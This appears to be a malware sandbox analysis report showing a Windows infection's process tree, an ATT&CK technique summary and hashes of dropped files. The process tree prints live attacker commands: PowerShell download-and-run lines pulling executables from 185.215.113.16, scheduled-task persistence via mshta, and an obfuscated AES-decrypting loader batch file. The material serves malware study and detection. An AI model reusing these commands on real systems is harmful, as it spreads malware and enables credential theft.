                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,10803156886904843115,16744221903251959588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
                                        9⤵
                                          PID:32
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,10803156886904843115,16744221903251959588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2596 /prefetch:8
                                          9⤵
                                            PID:2252
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,10803156886904843115,16744221903251959588,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:548
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,10803156886904843115,16744221903251959588,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:3900
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,10803156886904843115,16744221903251959588,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:5788
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,10803156886904843115,16744221903251959588,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
                                            9⤵
                                            • Uses browser remote debugging
                                            PID:5804
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 968
                                        7⤵
                                        • Program crash
                                        PID:3872
                                    • C:\Users\Admin\AppData\Local\Temp\1085048001\amnew.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1085048001\amnew.exe"
                                      6⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of FindShellTrayWindow
                                      PID:4776
                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                        7⤵
                                        • Downloads MZ/PE file
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:3088
                                    • C:\Users\Admin\AppData\Local\Temp\1085059101\824e937f96.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1085059101\824e937f96.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:2124
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c schtasks /create /tn wTvAdmahMtx /tr "mshta C:\Users\Admin\AppData\Local\Temp\f3OcULNld.hta" /sc minute /mo 25 /ru "Admin" /f
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3744
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /create /tn wTvAdmahMtx /tr "mshta C:\Users\Admin\AppData\Local\Temp\f3OcULNld.hta" /sc minute /mo 25 /ru "Admin" /f
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2516
                                      • C:\Windows\SysWOW64\mshta.exe
                                        mshta C:\Users\Admin\AppData\Local\Temp\f3OcULNld.hta
                                        7⤵
                                        • Checks computer location settings
                                        • System Location Discovery: System Language Discovery
                                        PID:3308
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'EFR2LEVEAIXDM6YXX0UJE5TSYK5VS3DO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                                          8⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Downloads MZ/PE file
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3436
                                          • C:\Users\Admin\AppData\Local\TempEFR2LEVEAIXDM6YXX0UJE5TSYK5VS3DO.EXE
                                            "C:\Users\Admin\AppData\Local\TempEFR2LEVEAIXDM6YXX0UJE5TSYK5VS3DO.EXE"
                                            9⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3308
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1085060021\am_no.cmd" "
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:452
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1085060021\am_no.cmd" any_word
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2568
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 2
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          • Delays execution with timeout.exe
                                          PID:2416
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4816
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3436
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                          8⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4088
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3976
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                          8⤵
                                            PID:2272
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:3292
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /create /tn "IMl0AmabYo2" /tr "mshta \"C:\Temp\QzIf3vwYR.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                            8⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3256
                                          • C:\Windows\SysWOW64\mshta.exe
                                            mshta "C:\Temp\QzIf3vwYR.hta"
                                            8⤵
                                              PID:5296
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:5448
                                        • C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe
                                          "C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:3880
                                          • C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:1436
                                          • C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:2836
                                          • C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4100
                                          • C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1085099001\7aencsM.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4752
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 984
                                            7⤵
                                            • Program crash
                                            PID:912
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1085100041\tYliuwV.ps1"
                                          6⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          PID:1628
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                            7⤵
                                              PID:5988
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                                8⤵
                                                  PID:6136
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  8⤵
                                                    PID:1088
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                      9⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:5752
                                              • C:\Users\Admin\AppData\Local\Temp\1085101001\Ta3ZyUR.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1085101001\Ta3ZyUR.exe"
                                                6⤵
                                                  PID:2960
                                                  • C:\Users\Admin\AppData\Local\Temp\1085101001\Ta3ZyUR.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1085101001\Ta3ZyUR.exe"
                                                    7⤵
                                                      PID:1488
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 968
                                                      7⤵
                                                      • Program crash
                                                      PID:5140
                                                  • C:\Users\Admin\AppData\Local\Temp\1085103001\DTQCxXZ.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1085103001\DTQCxXZ.exe"
                                                    6⤵
                                                      PID:5712
                                                    • C:\Users\Admin\AppData\Local\Temp\1085104001\d2YQIJa.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1085104001\d2YQIJa.exe"
                                                      6⤵
                                                        PID:5344
                                                      • C:\Users\Admin\AppData\Local\Temp\1085105001\Bjkm5hE.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\1085105001\Bjkm5hE.exe"
                                                        6⤵
                                                          PID:1948
                                                          • C:\Users\Admin\AppData\Local\Temp\1085105001\Bjkm5hE.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1085105001\Bjkm5hE.exe"
                                                            7⤵
                                                              PID:4540
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 956
                                                              7⤵
                                                              • Program crash
                                                              PID:2156
                                                          • C:\Users\Admin\AppData\Local\Temp\1085106001\qFqSpAp.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\1085106001\qFqSpAp.exe"
                                                            6⤵
                                                              PID:3900
                                                            • C:\Users\Admin\AppData\Local\Temp\1085108001\c95fbd32f4.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\1085108001\c95fbd32f4.exe"
                                                              6⤵
                                                                PID:6068
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3568 -ip 3568
                                                      1⤵
                                                        PID:1376
                                                      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        1⤵
                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                        • Checks BIOS information in registry
                                                        • Executes dropped EXE
                                                        • Identifies Wine through registry keys
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:220
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2572 -ip 2572
                                                        1⤵
                                                          PID:4392
                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                          1⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:452
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 660 -ip 660
                                                          1⤵
                                                            PID:1672
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4852 -ip 4852
                                                            1⤵
                                                              PID:2696
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2172 -ip 2172
                                                              1⤵
                                                                PID:4748
                                                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                1⤵
                                                                  PID:2200
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                  1⤵
                                                                    PID:1172
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3880 -ip 3880
                                                                    1⤵
                                                                      PID:1528
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2960 -ip 2960
                                                                      1⤵
                                                                        PID:516
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1948 -ip 1948
                                                                        1⤵
                                                                          PID:4292
                                                                        • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                          1⤵
                                                                            PID:2844
                                                                          • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                            1⤵
                                                                              PID:3540

                                                                            Network

                                                                            MITRE ATT&CK Enterprise v15

                                                                            Reconnaissance

                                                                            Resource Development

                                                                            Initial Access

                                                                            Execution

                                                                            Command and Scripting Interpreter

                                                                            1
                                                                            T1059

                                                                            PowerShell

                                                                            1
                                                                            T1059.001

                                                                            Scheduled Task/Job

                                                                            1
                                                                            T1053

                                                                            Scheduled Task

                                                                            1
                                                                            T1053.005

                                                                            Persistence

                                                                            Boot or Logon Autostart Execution

                                                                            1
                                                                            T1547

                                                                            Registry Run Keys / Startup Folder

                                                                            1
                                                                            T1547.001

                                                                            Modify Authentication Process

                                                                            1
                                                                            T1556

                                                                            Pre-OS Boot

                                                                            1
                                                                            T1542

                                                                            Bootkit

                                                                            1
                                                                            T1542.003

                                                                            Scheduled Task/Job

                                                                            1
                                                                            T1053

                                                                            Scheduled Task

                                                                            1
                                                                            T1053.005

                                                                            Privilege Escalation

                                                                            Boot or Logon Autostart Execution

                                                                            1
                                                                            T1547

                                                                            Registry Run Keys / Startup Folder

                                                                            1
                                                                            T1547.001

                                                                            Scheduled Task/Job

                                                                            1
                                                                            T1053

                                                                            Scheduled Task

                                                                            1
                                                                            T1053.005

                                                                            Defense Evasion

                                                                            Modify Authentication Process

                                                                            1
                                                                            T1556

                                                                            Modify Registry

                                                                            1
                                                                            T1112

                                                                            Pre-OS Boot

                                                                            1
                                                                            T1542

                                                                            Bootkit

                                                                            1
                                                                            T1542.003

                                                                            Virtualization/Sandbox Evasion

                                                                            2
                                                                            T1497

                                                                            Credential Access

                                                                            Credentials from Password Stores

                                                                            1
                                                                            T1555

                                                                            Credentials from Web Browsers

                                                                            1
                                                                            T1555.003

                                                                            Modify Authentication Process

                                                                            1
                                                                            T1556

                                                                            Steal Web Session Cookie

                                                                            1
                                                                            T1539

                                                                            Unsecured Credentials

                                                                            3
                                                                            T1552

                                                                            Credentials In Files

                                                                            3
                                                                            T1552.001

                                                                            Discovery

                                                                            Browser Information Discovery

                                                                            1
                                                                            T1217

                                                                            Query Registry

                                                                            7
                                                                            T1012

                                                                            System Information Discovery

                                                                            5
                                                                            T1082

                                                                            System Location Discovery

                                                                            1
                                                                            T1614

                                                                            System Language Discovery

                                                                            1
                                                                            T1614.001

                                                                            Virtualization/Sandbox Evasion

                                                                            2
                                                                            T1497

                                                                            Lateral Movement

                                                                            Collection

                                                                            Data from Local System

                                                                            3
                                                                            T1005

                                                                            Command and Control

                                                                            Exfiltration

                                                                            Impact

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin:.repos
                                                                              Filesize

                                                                              1.2MB

                                                                              MD5

                                                                              fc73ce2d6c00437db1912f8850b945f1

                                                                              SHA1

                                                                              5b233805fd34247493c0d9614ba4623014f50bd0

                                                                              SHA256

                                                                              4dfbb1d1c00a6691fc122071e9130b8b45c914a13c2e58d078afeddf65f806a8

                                                                              SHA512

                                                                              a6b73f50b66e14145e094a2d4919aca5a856ccd6342ed6e44b4952558de0441926273b5a3ee94b9ef0f4129082ab24744b5d3ee9de98192bc260299bec6cda60

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                              Filesize

                                                                              2B

                                                                              MD5

                                                                              d751713988987e9331980363e24189ce

                                                                              SHA1

                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                              SHA256

                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                              SHA512

                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                              Filesize

                                                                              152B

                                                                              MD5

                                                                              4255cae88563058c7eaed69088da0ab2

                                                                              SHA1

                                                                              2bcb70f6ae6ae0207a7a964422cac20c80b26394

                                                                              SHA256

                                                                              b0cb92f0d6e6cb20ace15d6bf06015570aee24c0d06a8102200dfd3cf4118a15

                                                                              SHA512

                                                                              cb41c1797e6d6c5a70d9045e0319ac92512deeb4d4280a1d9a607c2a4031db6027a050633b95fadce63f6f7513ba599f336182b6ce50a0cfbc44360723c461eb

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                              Filesize

                                                                              152B

                                                                              MD5

                                                                              806d271b63c2bc170813afa83e15671b

                                                                              SHA1

                                                                              b0a5d4f3e2094a99e402438f3ff4e153a7cb7453

                                                                              SHA256

                                                                              8c36754533e755375f987fe74c3499ba8f6044af05b416dded069e37f72d405e

                                                                              SHA512

                                                                              eb793dc197be47854473bd49ff09902e390562c182d87a670dcd7999f512fe4c090452dcb93a8bf7a4b8eb031de94f2e399dba802ca33f8764eea256eb5e805c

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                              Filesize

                                                                              5KB

                                                                              MD5

                                                                              8148c1dda57c353751bf3e3e0ebf49ba

                                                                              SHA1

                                                                              8763337c5c7f339d0a56cde8920e73db8cbb0212

                                                                              SHA256

                                                                              1ba8a217aa221530e1ca0675c9f93f684c1a97201df90e8a735f29ee0b54fe50

                                                                              SHA512

                                                                              3303db8cd9e559f062a434ca151b7557213dbe0ba106fe7b11853c1d8b824dfdd15e369b6249f46d9117a13a3ff2852d83f9f4ce6d3ab82cc7a205fbe705f11b

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                              Filesize

                                                                              16KB

                                                                              MD5

                                                                              ba60462c07f9c67215a54a7c244dea10

                                                                              SHA1

                                                                              968beac4de3178d99f8eae5e16fe9541d1f9101b

                                                                              SHA256

                                                                              6f5609ac57863ea518945406cf22e201fa0d573b75531a3d6930cab30581d040

                                                                              SHA512

                                                                              107d2c6d76553c81dd7cc0d1b32b79680426c17c008f20e26f3c53ad56884e3c2eac5e2f5625c1edccea1ba5095e6e052f50d47d3692c1e0cb3e02e1ba2fd97b

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\TempEFR2LEVEAIXDM6YXX0UJE5TSYK5VS3DO.EXE
                                                                              Filesize

                                                                              1.7MB

                                                                              MD5

                                                                              2d3aefd99a7ce1e1cea8d83dbb4f46ff

                                                                              SHA1

                                                                              372cb667e0dbbcbe5c299785b800076271f45909

                                                                              SHA256

                                                                              c17164f61da2390f457a507c9fda729c45aa50b05bc7df4585bb9c225c7c07c2

                                                                              SHA512

                                                                              99d5451c3d1bd78d1d91c60dbed636c723209f5b2bbd70a824d85963754cfbbda596ee4d3a397c69b6378b4ed8913c4038f5104700e6efe83dcc92ef68934b49

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\TempVRUIZEE4DMYHKGR9E24GWVGXSJON2CDM.EXE
                                                                              Filesize

                                                                              2.0MB

                                                                              MD5

                                                                              43734f27ba5d4291ffadfc994b5043e1

                                                                              SHA1

                                                                              bc1228fbb0d0d8c40e4d98c6a78d39e3d7e8a23f

                                                                              SHA256

                                                                              95ef554b8b19b7542045ec39ae55d6f1aa04120e5d9a9b54ae5f943fbac3029e

                                                                              SHA512

                                                                              c8f109a666a6634ed91604af517d22e0702a2c21aafe85cc68dcaccc4f61b8134bb9bc6aeb1798a32e697fe1a4d6de5e2d84a9cdb0195141550b679ebc95b823

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Temp\1014060001\6453bb3b98.exe
                                                                              Filesize

                                                                              345KB

                                                                              MD5

                                                                              3bc7df7bd28d062f0764332023340d2b

                                                                              SHA1

                                                                              a602f64795debb0222a704e8f851775dcf21cde3

                                                                              SHA256

                                                                              713e92e6b5f368bb1208f55f80a3353f8ffa25a97f914fad517032bf923782c9

                                                                              SHA512

                                                                              7039567543de586d26411b701387178f2129529a18537b1b4c292b4e93e783db37a551e3cebf77e0f6a67ebb10fddf5f62ba83093ec5e2985736e6acacde9bad

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
                                                                              Filesize

                                                                              9.8MB

                                                                              MD5

                                                                              db3632ef37d9e27dfa2fd76f320540ca

                                                                              SHA1

                                                                              f894b26a6910e1eb53b1891c651754a2b28ddd86

                                                                              SHA256

                                                                              0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d

                                                                              SHA512

                                                                              4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
                                                                              Filesize

                                                                              325KB

                                                                              MD5

                                                                              f071beebff0bcff843395dc61a8d53c8

                                                                              SHA1

                                                                              82444a2bba58b07cb8e74a28b4b0f715500749b2

                                                                              SHA256

                                                                              0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec

                                                                              SHA512

                                                                              1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d

                                                                              Download Submit

                                                                            • C:\Users\Admin\AppData\Local\Temp\1071208001\Bjkm5hE.exe
                                                                              Filesize

                                                                              345KB

                                                                              MD5

